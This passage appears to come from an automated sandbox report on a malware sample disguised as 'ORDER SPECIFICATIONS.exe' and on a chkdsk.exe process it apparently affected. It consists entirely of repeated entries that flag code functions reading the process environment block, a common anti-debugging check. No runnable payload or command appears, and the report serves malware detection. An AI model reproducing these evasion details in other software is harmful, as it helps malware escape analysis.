            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01543884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01543884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015090AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01598B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015453CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015453CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EDBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0157D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01595BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01554257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0150927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0157B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0157B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01598A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01504A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01504A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01503D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01543540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01573D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014E7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014EC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0154A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01598D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014D3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014CAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01546DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_01578DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014DD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_0158FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014C2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014FFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015905AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_015905AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exeCode function: 5_2_014F1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014FA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_0155C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014E746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_0159740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_01581C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_01546C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014FBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_01598CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_015814FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_01546CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014D849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014DEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014DFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_01598F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014FA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_0155FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_0159070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014EF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014C4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014FE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_015037F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_01547794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014D8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014D7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_0158AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014D766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014EAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014CC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014F8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_01581608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014FA61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_0157FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014CE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014F36CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_01598ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_0157FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_01508EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014F16E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_014D76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_0155FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_015446A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe Code function: 5_2_01590EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05567D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0556B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05583D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055C3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0556C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0554B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0554C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05549100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05618D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05553D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0554AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055CA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05574D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05564120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05564120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055F8DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0554B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055D41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0555D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05572990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0556C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05572581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05542D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05571DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055C51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055735A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055761A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055C69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05560050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055DC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05602073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05611074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0556746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055C7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055C6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05601C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0561740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05614015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0557BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_0555B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055DB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055DB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_056014FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_055C6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 16_2_05618CD6 mov eax, dword ptr fs:[00000030h]
